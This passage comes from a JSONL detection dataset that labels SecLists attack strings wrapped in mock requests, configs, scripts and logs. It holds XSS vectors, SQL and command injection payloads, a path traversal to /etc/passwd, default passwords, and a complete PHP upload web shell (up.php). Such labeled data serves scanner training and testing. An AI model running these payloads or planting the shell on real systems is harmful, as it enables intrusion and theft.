"malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#X00003C", "injection_type": "cmd"}}]} {"id": "seclists_02676", "source": "seclists", "source_license": "MIT", "text": "filename=<!", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!", "injection_type": "cmd"}}]} {"id": "seclists_02677", "source": "seclists", "source_license": "MIT", "text": "password: gregory1\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "gregory1"}}]} {"id": "seclists_02678", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<style>:target {transform: rotate(180deg);}</style><optgroup id=x style=\"transition:transform 2s\" ontransitionrun=alert(1)></optgroup> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>:target {transform: rotate(180deg);}</style><optgroup id=x style=\"transition:transform 2s\" ontransitionrun=alert(1)></optgroup>", "injection_type": "XSS"}}]} {"id": "seclists_02679", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=1)) or pg_sleep(__TIME__)-- HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "1)) or pg_sleep(__TIME__)--", "injection_type": "SQL"}}]} {"id": "seclists_02680", "source": "seclists", "source_license": "MIT", "text": "filename=%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HBIFJL%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HBIFJL%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26", "injection_type": "cmd"}}]} {"id": "seclists_02681", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf \\x27UNION SELECT", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\\x27UNION SELECT", "injection_type": "cmd"}}]} {"id": "seclists_02682", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf ../../../../../../../../../../../../etc/passwd", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "../../../../../../../../../../../../etc/passwd", "injection_type": "cmd"}}]} {"id": "seclists_02683", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %22|echo$IFSYOKEXI$((60%2B52))$(echo$IFSYOKEXI)YOKEXI'", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22|echo$IFSYOKEXI$((60%2B52))$(echo$IFSYOKEXI)YOKEXI'", "injection_type": "cmd"}}]} {"id": "seclists_02684", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=kajak\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "kajak"}}]} {"id": "seclists_02685", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=\\nnetstat -a%\\n HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\\nnetstat -a%\\n", "injection_type": "cmd"}}]} {"id": "seclists_02686", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host='&&echo$IFSAECLDN$((15%2B72))$(echo$IFSAECLDN)AECLDN\\ HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'&&echo$IFSAECLDN$((15%2B72))$(echo$IFSAECLDN)AECLDN\\", "injection_type": "cmd"}}]} {"id": "seclists_02687", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit Description: This uses an .htc file which must be on the same server as the XSS vector. The example file works by pulling in the JavaScript and running it as part of the style attribute. HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: This uses an .htc file which must be on the same server as the XSS vector. The example file works by pulling in the JavaScript and running it as part of the style attribute.", "injection_type": "XSS"}}]} {"id": "seclists_02688", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf ${proc_open(print(`echo%20BPIHJI%0aecho%20$((94%2B16))%0aecho%20BPIHJI%0aecho%20BPIHJI`)%3B%252523BPIHJI", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "${proc_open(print(`echo%20BPIHJI%0aecho%20$((94%2B16))%0aecho%20BPIHJI%0aecho%20BPIHJI`)%3B%252523BPIHJI", "injection_type": "cmd"}}]} {"id": "seclists_02689", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Description: STYLE tag using background.</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: STYLE tag using background.", "injection_type": "XSS"}}]} {"id": "seclists_02690", "source": "seclists", "source_license": "MIT", "text": "username=select * from information_schema.tables--&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "select * from information_schema.tables--", "injection_type": "SQL"}}]} {"id": "seclists_02691", "source": "seclists", "source_license": "MIT", "text": "filename=%2522%7C%20%5B%207%20-ne%20%24%28echo%20JUHLQP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2522%7C%20%5B%207%20-ne%20%24%28echo%20JUHLQP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20", "injection_type": "cmd"}}]} {"id": "seclists_02692", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Description: URL string evasion (assuming \u201dhttp://www.google.com/\u201d is programmatically disallowed).</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: URL string evasion (assuming \u201dhttp://www.google.com/\u201d is programmatically disallowed).", "injection_type": "XSS"}}]} {"id": "seclists_02693", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=Cisco,root,password,Added by DPL admin. From\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Cisco,root,password,Added by DPL admin. From"}}]} {"id": "seclists_02694", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<big id=x tabindex=1 onfocus=alert(1)></big>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<big id=x tabindex=1 onfocus=alert(1)></big>", "injection_type": "XSS"}}]} {"id": "seclists_02695", "source": "seclists", "source_license": "MIT", "text": "filename=%22%0aecho$IFSUTHJSW$((11%2B12))$(echo$IFSUTHJSW)UTHJSW%27", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22%0aecho$IFSUTHJSW$((11%2B12))$(echo$IFSUTHJSW)UTHJSW%27", "injection_type": "cmd"}}]} {"id": "seclists_02696", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=& id HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "& id", "injection_type": "cmd"}}]} {"id": "seclists_02697", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf \"|echo%20XLPJUH$((63%2B35))$(echo%20XLPJUH)XLPJUH//", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"|echo%20XLPJUH$((63%2B35))$(echo%20XLPJUH)XLPJUH//", "injection_type": "cmd"}}]} {"id": "seclists_02698", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf --';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "--';", "injection_type": "cmd"}}]} {"id": "seclists_02699", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">\"><link rel=import href=data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"><link rel=import href=data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;", "injection_type": "XSS"}}]} {"id": "seclists_02700", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<rtc onfocusout=alert(1) tabindex=1 id=x></rtc><input autofocus>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<rtc onfocusout=alert(1) tabindex=1 id=x></rtc><input autofocus>", "injection_type": "XSS"}}]} {"id": "seclists_02701", "source": "seclists", "source_license": "MIT", "text": "filename=&#X003c;", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#X003c;", "injection_type": "cmd"}}]} {"id": "seclists_02702", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit String: '%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e' HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: '%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'", "injection_type": "XSS"}}]} {"id": "seclists_02703", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<title onmouseup=\"alert(1)\">test</title>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<title onmouseup=\"alert(1)\">test</title>", "injection_type": "XSS"}}]} {"id": "seclists_02704", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:Oracle,CATALOG,CATALOG,", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Oracle,CATALOG,CATALOG,"}}]} {"id": "seclists_02705", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<x 1=\"1\"onxxx=1\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<x 1=\"1\"onxxx=1", "injection_type": "XSS"}}]} {"id": "seclists_02706", "source": "seclists", "source_license": "MIT", "text": "GET /profile?name={{42*42}} HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.ssti", "severity": "critical", "compliance": [], "fields": {"payload": "{{42*42}}", "injection_type": "SSTI"}}]} {"id": "seclists_02707", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<br draggable=\"true\" ondragleave=\"alert(1)\">test</br> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<br draggable=\"true\" ondragleave=\"alert(1)\">test</br>", "injection_type": "XSS"}}]} {"id": "seclists_02708", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit String: +alert(0)+\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: +alert(0)+", "injection_type": "XSS"}}]} {"id": "seclists_02709", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<x contenteditable onpaste=alert(1)>paste here!\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<x contenteditable onpaste=alert(1)>paste here!", "injection_type": "XSS"}}]} {"id": "seclists_02710", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %22|echo%20LAHTXU$((26%2B18))$(echo%20LAHTXU)LAHTXU&", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22|echo%20LAHTXU$((26%2B18))$(echo%20LAHTXU)LAHTXU&", "injection_type": "cmd"}}]} {"id": "seclists_02711", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %26%20sleep%200%20%26%26%20str%3D%24%28echo%20OFDULD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%26%20sleep%200%20%26%26%20str%3D%24%28echo%20OFDULD%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527", "injection_type": "cmd"}}]} {"id": "seclists_02712", "source": "seclists", "source_license": "MIT", "text": "password: daedalus\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "daedalus"}}]} {"id": "seclists_02713", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<body onorientationchange=alert(1)> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<body onorientationchange=alert(1)>", "injection_type": "XSS"}}]} {"id": "seclists_02714", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit String: <SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT>", "injection_type": "XSS"}}]} {"id": "seclists_02715", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=benchmark(10000000,MD5(1))# HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "benchmark(10000000,MD5(1))#", "injection_type": "SQL"}}]} {"id": "seclists_02716", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<style>:target {color: red;}</style><big id=x style=\"transition:color 10s\" ontransitioncancel=alert(1)></big>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>:target {color: red;}</style><big id=x style=\"transition:color 10s\" ontransitioncancel=alert(1)></big>", "injection_type": "XSS"}}]} {"id": "seclists_02717", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><template id=x tabindex=1 onbeforeactivate=alert(1)></template></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<template id=x tabindex=1 onbeforeactivate=alert(1)></template>", "injection_type": "XSS"}}]} {"id": "seclists_02718", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:Sercom,admin,admin,@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Sercom,admin,admin,"}}]} {"id": "seclists_02719", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=adrian\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "adrian"}}]} {"id": "seclists_02720", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><center onmouseenter=\"alert(1)\">test</center></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<center onmouseenter=\"alert(1)\">test</center>", "injection_type": "XSS"}}]} {"id": "seclists_02721", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: |echo$IFSPYNQQN$((22%2B41))$(echo$IFSPYNQQN)PYNQQN\\", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "|echo$IFSPYNQQN$((22%2B41))$(echo$IFSPYNQQN)PYNQQN\\", "injection_type": "cmd"}}]} {"id": "seclists_02722", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%0A%20str%3D%24%28echo%20IRXTAA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20// HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0A%20str%3D%24%28echo%20IRXTAA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//", "injection_type": "cmd"}}]} {"id": "seclists_02723", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Exploit String: <SCRIPT SRC=http://ha.ckers.org/xss.js HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <SCRIPT SRC=http://ha.ckers.org/xss.js", "injection_type": "XSS"}}]} {"id": "seclists_02724", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Author Name: .mario</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: .mario", "injection_type": "XSS"}}]} {"id": "seclists_02725", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=channel\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "channel"}}]} {"id": "seclists_02726", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%0A%20str%3D%24%28echo%20LJKRDD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0A%20str%3D%24%28echo%20LJKRDD%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527", "injection_type": "cmd"}}]} {"id": "seclists_02727", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Name: Embedded Encoded Tab</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: Embedded Encoded Tab", "injection_type": "XSS"}}]} {"id": "seclists_02728", "source": "seclists", "source_license": "MIT", "text": "<?\n//\n// PHP_KIT\n//\n// up.php = File Upload\n//\n// by: The Dark Raver\n// modified: 21/01/2004\n//\n?>\n\n<html><body>\n\n<form enctype=\"multipart/form-data\" action=\"\" method=\"post\">\n<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"1000000\">\n<p>Local File: <input name=\"userfile\" type=\"file\">\n<p>Remote File: <input name=\"remotefile\" type=\"text\">\n<input type=\"submit\" value=\"Send\">\n</form><br><br><br>\n\n<?\n\nif(is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) {\n copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['remotefile']);\n echo \"Uploaded file: \" . $HTTP_POST_FILES['userfile']['name'];\n} else {\n echo \"No File Uploaded\";\n}\n\n?>\n\n</html></body>\n\n", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "php", "filename": "up.php"}}]} {"id": "seclists_02729", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><progress onmousemove=\"alert(1)\">test</progress></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<progress onmousemove=\"alert(1)\">test</progress>", "injection_type": "XSS"}}]} {"id": "seclists_02730", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<style>:target {transform: rotate(180deg);}</style><xmp id=x style=\"transition:transform 2s\" ontransitionrun=alert(1)></xmp>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>:target {transform: rotate(180deg);}</style><xmp id=x style=\"transition:transform 2s\" ontransitionrun=alert(1)></xmp>", "injection_type": "XSS"}}]} {"id": "seclists_02731", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<aside draggable=\"true\" ondragend=\"alert(1)\">test</aside> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<aside draggable=\"true\" ondragend=\"alert(1)\">test</aside>", "injection_type": "XSS"}}]} {"id": "seclists_02732", "source": "seclists", "source_license": "MIT", "text": "username=UNION SELECT&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "UNION SELECT", "injection_type": "SQL"}}]} {"id": "seclists_02733", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Description: New-lined requiring name contained vector - this time not comment obfuscated so easier to detect.</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: New-lined requiring name contained vector - this time not comment obfuscated so easier to detect.", "injection_type": "XSS"}}]} {"id": "seclists_02734", "source": "seclists", "source_license": "MIT", "text": "filename=%3B%20str%3D%24%28echo%20ZNGHTM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%3B%20str%3D%24%28echo%20ZNGHTM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C", "injection_type": "cmd"}}]} {"id": "seclists_02735", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %0A/usr/bin/id%0A", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0A/usr/bin/id%0A", "injection_type": "cmd"}}]} {"id": "seclists_02736", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %5C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%5C", "injection_type": "cmd"}}]} {"id": "seclists_02737", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=<div draggable=\"true\" contenteditable>drag me</div><element ondragover=alert(1) contenteditable>drop here</element> HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<div draggable=\"true\" contenteditable>drag me</div><element ondragover=alert(1) contenteditable>drop here</element>", "injection_type": "XSS"}}]} {"id": "seclists_02738", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:formula@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "formula"}}]} {"id": "seclists_02739", "source": "seclists", "source_license": "MIT", "text": "password: UNIX,halt,halt,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "UNIX,halt,halt,"}}]} {"id": "seclists_02740", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<template onmouseover=\"alert(1)\">test</template>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<template onmouseover=\"alert(1)\">test</template>", "injection_type": "XSS"}}]} {"id": "seclists_02741", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf ;id;", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ";id;", "injection_type": "cmd"}}]} {"id": "seclists_02742", "source": "seclists", "source_license": "MIT", "text": "password: danny1\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "danny1"}}]} {"id": "seclists_02743", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %27%3B%20str%3D%24%28echo%20HLDNYH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27%3B%20str%3D%24%28echo%20HLDNYH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26", "injection_type": "cmd"}}]} {"id": "seclists_02744", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = 'or 'whatever' in ('whatever')';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or 'whatever' in ('whatever')", "injection_type": "SQL"}}]} {"id": "seclists_02745", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><u onbeforecut=\"alert(1)\" contenteditable>test</u></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<u onbeforecut=\"alert(1)\" contenteditable>test</u>", "injection_type": "XSS"}}]} {"id": "seclists_02746", "source": "seclists", "source_license": "MIT", "text": "password: Toshiba,<BLANK>,24Banc81,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Toshiba,<BLANK>,24Banc81,"}}]} {"id": "seclists_02747", "source": "seclists", "source_license": "MIT", "text": "filename=%22%3B%20str%3D%24%28echo%20VPBZFR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22%3B%20str%3D%24%28echo%20VPBZFR%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526", "injection_type": "cmd"}}]} {"id": "seclists_02748", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%7C%20%5B%204%20-ne%20%24%28echo%20HHUNZT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%20%5B%204%20-ne%20%24%28echo%20HHUNZT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526", "injection_type": "cmd"}}]} {"id": "seclists_02749", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=|echo$IFSMNCLPS$((56%2B63))$(echo$IFSMNCLPS)MNCLPS%22 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "|echo$IFSMNCLPS$((56%2B63))$(echo$IFSMNCLPS)MNCLPS%22", "injection_type": "cmd"}}]} {"id": "seclists_02750", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><marquee onmousemove=\"alert(1)\">test</marquee></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<marquee onmousemove=\"alert(1)\">test</marquee>", "injection_type": "XSS"}}]} {"id": "seclists_02751", "source": "seclists", "source_license": "MIT", 